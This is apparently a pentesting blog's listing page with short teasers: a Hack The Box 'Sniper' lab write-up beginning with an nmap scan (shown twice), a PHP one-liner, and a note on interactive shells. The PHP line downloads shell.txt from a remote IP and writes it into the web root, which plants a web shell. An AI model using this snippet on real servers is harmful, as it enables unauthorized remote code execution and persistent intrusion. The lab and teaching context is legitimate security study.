Hackthebox – Sniper
As with any system, I start with a series of port scans, including a -A scan. root@kalivm:~/Sniper# nmap -A 10.10.10.151
Read moreAs with any system, I start with a series of port scans, including a -A scan. root@kalivm:~/Sniper# nmap -A 10.10.10.151
Read morephp file transfer Nice PHP Example to transfer code <?php file_put_contents(“/var/www/html/sedje.php”, file_get_contents(“http://10.13.37.152/shell.txt”));?> interactive shell A method for better interactive shell
Read more